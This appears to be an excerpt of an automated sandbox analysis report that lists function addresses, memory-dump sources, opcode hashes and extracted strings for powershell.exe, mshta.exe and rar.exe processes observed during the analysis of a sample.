Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: inet_ntoa
String ID: packed IP wrong length for inet_ntoa$y*:inet_ntoa
API String ID: 1879540557-3027498899
Opcode ID: fb079eef545712c8b6bd07bbbbfc0f79a2b8e4f0d6572cd66a148abd21c5c037
Instruction ID: 1e5c240730af168a0fe8d044490bf0b9da495c68addce06bdfff6f32cbfe71b2
Opcode Fuzzy Hash: fb079eef545712c8b6bd07bbbbfc0f79a2b8e4f0d6572cd66a148abd21c5c037
Instruction Fuzzy Hash: 0F01C8A1A08B8A86EB109B29E89407D23A0FF88FC9F940131DB4E53674DE3CF549C700

Analysis Process: powershell.exePID: 7288, Parent PID: 3936COMMON

Executed Functions

Function 00007FF8476D3DAA Relevance: 1.3, Instructions: 1293COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2291040356.00007FF8476D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff8476d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a59e9974c6555634f106039553276b550cd824937975b67364f603732ff51e0
Instruction ID: 7fbc745204c8c82f63f65221b202fc77f586c089b050e2156470931071fe33fb
Opcode Fuzzy Hash: 2a59e9974c6555634f106039553276b550cd824937975b67364f603732ff51e0
Instruction Fuzzy Hash: 52820831D1DBCA9FEB96A73858551B83FE2EF56660B0901FBC84DC71E3D9189C068392

Function 00007FF8476D67F5 Relevance: .4, Instructions: 435COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2291040356.00007FF8476D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff8476d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aafad5d7cde631a3d56d9322cbc9b8af926bddd5a1b201276d42befc04261df6
Instruction ID: 9a93f8933462d77e5426a2f45b57c35f22fcbdc065cf17c908b36da571b333cc
Opcode Fuzzy Hash: aafad5d7cde631a3d56d9322cbc9b8af926bddd5a1b201276d42befc04261df6
Instruction Fuzzy Hash: EED13531E2DA8A9FEBA5BB2858155B97FE2EF16790B0801FED04DC70D3DA18AC05C351

Function 00007FF847609863 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77156b6cfef870d9e0cf93ef81d9410687c617d565f254adfc2f7dfe20bdf1ea
Instruction ID: 244a16805e3776602cb2b7f6e1d26740457c79ac2a94d164e3f8a232c731716c
Opcode Fuzzy Hash: 77156b6cfef870d9e0cf93ef81d9410687c617d565f254adfc2f7dfe20bdf1ea
Instruction Fuzzy Hash: F741F63191CB888FDB19DB1C980A6A97FF0EB96711F04426FD49993193DB206856CBC2

Function 00007FF8474EE380 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2286028488.00007FF8474ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8474ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff8474ed000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee75fffab7667c8361e0d1e505cce46769b4de136b75f98858fe363693a0975d
Instruction ID: 42466ae8617b81480313523e10fc0ec5672e2fabfe116f3e5fb49fb6433e7fd1
Opcode Fuzzy Hash: ee75fffab7667c8361e0d1e505cce46769b4de136b75f98858fe363693a0975d
Instruction Fuzzy Hash: 3A41347080DBC48FE75ADB3898419623FF0EF52360B1505EFD088CB1A7D629E846C7A2

Function 00007FF8476D429F Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2291040356.00007FF8476D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff8476d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f3aa2043c0e836b16c23035e2bf715ff938d7c2f80c163988267fdfa03c346
Instruction ID: b0e9c0c23a1c7c55738ad9fcee2464167fa4442b9bdf630ef49fdcf6375fc73e
Opcode Fuzzy Hash: 07f3aa2043c0e836b16c23035e2bf715ff938d7c2f80c163988267fdfa03c346
Instruction Fuzzy Hash: F6210932D2EA878FEBA9EB2D94511786FD3EF4139075901BACC4EC7196DE18EC018381

Function 00007FF84760AA18 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac97002ac587445604304f432ffd9f5785bdc6df0b9771567e802143bc596b35
Instruction ID: 6a24ec0f13deedae567cc6cfe27b8aade8304f382c85183fbe93ecb940f38690
Opcode Fuzzy Hash: ac97002ac587445604304f432ffd9f5785bdc6df0b9771567e802143bc596b35
Instruction Fuzzy Hash: 2C21923190CB4C8FDB58DF9C984A7E97BF0EBA9321F00422FD449C3152D674A45ACB91

Function 00007FF8476D459C Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2291040356.00007FF8476D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff8476d0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21bd6ac832c1f6192161473110711df78295bec060d00a563d4ecd717e6f99ba
Instruction ID: 4d3a64dbc5709b8c12bf4307545ae6e948b6ac1d66ad9b442f0f4c6c160246a2
Opcode Fuzzy Hash: 21bd6ac832c1f6192161473110711df78295bec060d00a563d4ecd717e6f99ba
Instruction Fuzzy Hash: DC110632D1D5868FEAA5FB28945057C7FD2FF40760B4901BACC4ED7197EA18AC008781

Function 00007FF84760A380 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed481dc370c1354ac6ed3134fe16395ae8133b41d3705733bbb056607bfa5e8d
Instruction ID: 8b8b42726222d2f3ca52418d0dd401dc3c09d9920c3e4e983f4f66247d5c51df
Opcode Fuzzy Hash: ed481dc370c1354ac6ed3134fe16395ae8133b41d3705733bbb056607bfa5e8d
Instruction Fuzzy Hash: A811A37180DAC48FDB1ADB3888590A87FB1FF22244B0801DBD448C70A3EA5199198781

Function 00007FF8476033B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction ID: c1491cdf6655f2431fdc1454143ba792f73c78be7c36f364b32377c467292d69
Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
Instruction Fuzzy Hash: E301677111CB0C8FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3695DA36E882CB45

Non-executed Functions

Function 00007FF847608BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

K_^6, xrefs: 00007FF847608BFA
K_^F, xrefs: 00007FF847608C6A
K_^J, xrefs: 00007FF847608C7A
K_^<, xrefs: 00007FF847608C2A
K_^I, xrefs: 00007FF847608C72

Memory Dump Source

Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd

Similarity

API ID:
String ID: K_^6$K_^<$K_^F$K_^I$K_^J
API String ID: 0-3659583007
Opcode ID: b51c032d8e036fa40f8934c4fd8bcd85e0c9190da3d2be33bda1ec95d6b239c8
Instruction ID: afcc89256b9b6b911ab0d4aa6d1d75ea3e5d2a88db136dee3f0146a441c7cc17
Opcode Fuzzy Hash: b51c032d8e036fa40f8934c4fd8bcd85e0c9190da3d2be33bda1ec95d6b239c8
Instruction Fuzzy Hash: 1B2124B770D5167FDB027BADB8425DC77A0DB946BA34842B3D258CB543E914B08B8684

Function 00007FF8476086FA Relevance: 6.3, Strings: 5, Instructions: 83COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FF847608712
K_^, xrefs: 00007FF8476086FA
K_^, xrefs: 00007FF847608772
K_^, xrefs: 00007FF847608722
K_^, xrefs: 00007FF8476087C2

Memory Dump Source

Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^$K_^
API String ID: 0-4077390204
Opcode ID: 3983dbb1e5b8867a63ce7a7e03bb572dc0824c86393600d8af9704b84818bfab
Instruction ID: 40588b214f8faf9bbcff71d64fc98ec5a1ffa0fb491076cd7483965532a3d0d9
Opcode Fuzzy Hash: 3983dbb1e5b8867a63ce7a7e03bb572dc0824c86393600d8af9704b84818bfab
Instruction Fuzzy Hash: C431A7B380D7C79FDB52DA295CA90DD7FF0EF12288B0901F6C898CE197FE6459568201

Function 00007FF847608955 Relevance: 5.1, Strings: 4, Instructions: 145COMMON

Download Yara Rule

Strings

K_^, xrefs: 00007FF847608AC2
K_^, xrefs: 00007FF847608A2A
K_^, xrefs: 00007FF8476089C9
K_^, xrefs: 00007FF847608A7A

Memory Dump Source

Source File: 0000000E.00000002.2289447603.00007FF847600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF847600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff847600000_powershell.jbxd

Similarity

API ID:
String ID: K_^$K_^$K_^$K_^
API String ID: 0-4267328068
Opcode ID: 27a61c601c2f726b43eb6e9385ab40fa402ab6daad248b1dc8c8eb5be4a70542
Instruction ID: 9748341b4074419c7b874d96d0f9845c9f8e5d5a9dbc61805678bc40a11479a5
Opcode Fuzzy Hash: 27a61c601c2f726b43eb6e9385ab40fa402ab6daad248b1dc8c8eb5be4a70542
Instruction Fuzzy Hash: ED51A7B290E7C39FE746D6294866159BFB1FF52398B0901F7C0888F893FE5918578712

Analysis Process: mshta.exePID: 7308, Parent PID: 6512COMMON

Executed Functions

Function 0000011A40230FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000003.2084276233.0000011A40230000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000011A40230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_11a40230000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 7c48de83e7ec3285f8f8eb13d6a91317641ae2873f771abfaea330f59c6e3639
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 439002244D640656D42811A10D952DC54406788250FD84481461690988D8BD02962163

Analysis Process: powershell.exePID: 7452, Parent PID: 2820COMMON

Executed Functions

Function 00007FF8476B1797 Relevance: .8, Instructions: 805COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.2354907303.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff8476b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab42cb9a05f5e7dce7d7ba0ad9d7d22999539bac6aa7594106c1cbc9d95dc3da
Instruction ID: 15759f2d94ce8c6ee4f03b93ca63356f43b777f1a27179fbf653530b12537ff5
Opcode Fuzzy Hash: ab42cb9a05f5e7dce7d7ba0ad9d7d22999539bac6aa7594106c1cbc9d95dc3da
Instruction Fuzzy Hash: B3326831E0DBD99FEB5AA73858601B97BE2EF67250B1801FBC14CC7197EA18AC05C752

Function 00007FF8475E4DD3 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.2354179055.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff8475e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2491fe07845c2a3ab86427b234118cdeaa53a5333b3c6055f289c3b4684c645f
Instruction ID: 10b6bbc32e694c544e947b6c01f9fe020ba6f6baa05a7a1b8e5514e873d7bd37
Opcode Fuzzy Hash: 2491fe07845c2a3ab86427b234118cdeaa53a5333b3c6055f289c3b4684c645f
Instruction Fuzzy Hash: CB61D571E0CA4C8FDB45EB6CD8556ADBBF1EF4A310F1441AED009DB292DE35A802CB80

Function 00007FF8476B17D9 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.2354907303.00007FF8476B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8476B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff8476b0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6126abdebfa7187f47c42e69876a39f5c28c222458737bf564c19a23522b8a85
Instruction ID: 0c841021faef3f727b48c0943c1cdad2f6fca451addfacccfae004cb53392571
Opcode Fuzzy Hash: 6126abdebfa7187f47c42e69876a39f5c28c222458737bf564c19a23522b8a85
Instruction Fuzzy Hash: BE413832E1CB959FEB5AA728485117D3BE2EFA7250B1900FBC14DC7197EE19AC06C742

Function 00007FF8475E3945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000044.00000002.2354179055.00007FF8475E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8475E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_68_2_7ff8475e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: b83def9539666f2da710551e04baa95c2c31cb8b3f6379e9650b0b804a7e0f67
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 2201677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3695D736E881CB45

Analysis Process: rar.exePID: 8048, Parent PID: 7112COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1213
Total number of Limit Nodes:	37

Executed Functions

Function 00007FF6185D54C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

LOG, xrefs: 00007FF6185D5CD0
+, xrefs: 00007FF6185D6535
EML, xrefs: 00007FF6185D5D6B
default.sfx, xrefs: 00007FF6185D60F4
stdin, xrefs: 00007FF6185D6236
OFF, xrefs: 00007FF6185D5E4B
VER, xrefs: 00007FF6185D5EBA
stdin, xrefs: 00007FF6185D672D
*?., xrefs: 00007FF6185D598C
SFX, xrefs: 00007FF6185D60CC
NUL, xrefs: 00007FF6185D5DB3
ERR, xrefs: 00007FF6185D5D40
rar.log, xrefs: 00007FF6185D5CE5
*.%ls, xrefs: 00007FF6185D59AF
7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF6185D5935
SND, xrefs: 00007FF6185D5D11

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction ID: 96eb7d299271095d4bcc2c87a4e598a49045f9307650ea93602114e3ff7f8a8d
Opcode Fuzzy Hash: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
Instruction Fuzzy Hash: A3C2B47290C99281EBA49B3481441BD26D1EF01FB4F948335DE4ECB2CADE6DE546C3AC

Function 00007FF6185D901C Relevance: 4.5, APIs: 3, Instructions: 35encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF6185D904D
CryptGenRandom.ADVAPI32 ref: 00007FF6185D9061
CryptReleaseContext.ADVAPI32 ref: 00007FF6185D9074

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: Crypt$Context$AcquireRandomRelease
String ID:
API String ID: 1815803762-0
Opcode ID: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction ID: e64e8e079d17c11f2234c249b4e6e5a8f57d3de70cd7213aa6ff707ef0810001
Opcode Fuzzy Hash: a0191cfd7649e62a748f4a6898c5e4dd5358cd018192ea96d54baefd87fc6459
Instruction Fuzzy Hash: 4A016D2AB08A5182E7409B26A9443296762EBC4FE0F188131DE4D83B68CF7DD98A8744

Function 00007FF6185EAE10 Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF6185EB0C7

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88f45f32f7d6f697d6459e58c3cfe5d2f6646924d00db2152a98e2005056ce91
Instruction ID: e69ce35262e7ace30c205714b1a1461f1e2ad62c2bc2974f143ce6e34fcb0a28
Opcode Fuzzy Hash: 88f45f32f7d6f697d6459e58c3cfe5d2f6646924d00db2152a98e2005056ce91
Instruction Fuzzy Hash: 6371DD32A05A8586D744DF3AE8052EC73A1FBC8FA8F044135DB5DCB39ADF78A0519798

Function 00007FF618603EA8 Relevance: 25.0, APIs: 3, Strings: 11, Instructions: 491
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF618603EF9
GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,?,00007FF618603E8F,?,00007FF6185F7E90), ref: 00007FF618603F14
snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6186043C6

Strings

DIALOG, xrefs: 00007FF618604227
RTL, xrefs: 00007FF61860437A
$%s:, xrefs: 00007FF61860439E
STRINGS, xrefs: 00007FF618604219
*messages***, xrefs: 00007FF618604080
@%s:, xrefs: 00007FF6186043A5
\, xrefs: 00007FF618604519
DIRECTION, xrefs: 00007FF618604243
*messages***, xrefs: 00007FF618604050
MENU, xrefs: 00007FF618604235
,, xrefs: 00007FF6186043FB

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: FileModuleNamesnprintfwcschr
String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS$\
API String ID: 602362809-1645646101
Opcode ID: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
Instruction ID: 52b156811b0f7fe27b8d6cbf918231f144206850008f24821e5084d1439b7534
Opcode Fuzzy Hash: 13040d61f0e7da43208126d1082a5dded3eea02b21a4f98514b48b8c6faaa874
Instruction Fuzzy Hash: E522B461B18E8285EB31DB35D4906B96361FF44BA8F804135EA4EC76D5EF2CE944E38C

Function 00007FF6185D4FD0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 293
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcschr.LIBVCRUNTIME ref: 00007FF6185D5043
wcschr.LIBVCRUNTIME ref: 00007FF6185D5129

Strings

AFUMD, xrefs: 00007FF6185D5122
.part, xrefs: 00007FF6185D50A5
.rar, xrefs: 00007FF6185D50E6
.rar, xrefs: 00007FF6185D508E
stdin, xrefs: 00007FF6185D52C2
FUADPXETK, xrefs: 00007FF6185D503C

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381239083.00007FF618648000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381271413.00007FF618649000.00000008.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61864A000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618654000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF61865E000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381304156.00007FF618666000.00000004.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381439789.00007FF618668000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381499110.00007FF61866E000.00000002.00000001.01000000.0000001E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_103_2_7ff6185c0000_rar.jbxd

Similarity

API ID: wcschr
String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
API String ID: 1497570035-1281034975
Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction ID: 179d1992b9cde7e68205fcd3078c6f39688a8ab64daff25728fb93ce5fa57530
Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
Instruction Fuzzy Hash: 68C18326A1CD8290EBA4AE3589511FC1351FF46FA9F844231FE4ECA6DBDE2CE504D349

Function 00007FF618607F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF61860805C

Part of subcall function 00007FF61860B3F0: GetSystemDirectoryW.KERNEL32(00000000,00007FF618607F72), ref: 00007FF61860B41E

GetProcAddressForCaller.KERNELBASE ref: 00007FF618607F88
GetProcAddress.KERNEL32 ref: 00007FF618607FA3

Strings

CryptProtectMemory, xrefs: 00007FF618607F7E
CryptUnprotectMemory failed, xrefs: 00007FF618608053
CryptProtectMemory failed, xrefs: 00007FF618608009
Crypt32.dll, xrefs: 00007FF618607F66
CryptUnprotectMemory, xrefs: 00007FF618607F95

Memory Dump Source

Source File: 00000067.00000002.2381138003.00007FF6185C1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF6185C0000, based on PE: true

Associated: 00000067.00000002.2381104736.00007FF6185C0000.00000002.00000001.01000000.0000001E.sdmpDownload File
Associated: 00000067.00000002.2381200345.00007FF618630000.00000002.00000001.01000000.0000001E.sdmpDownload File
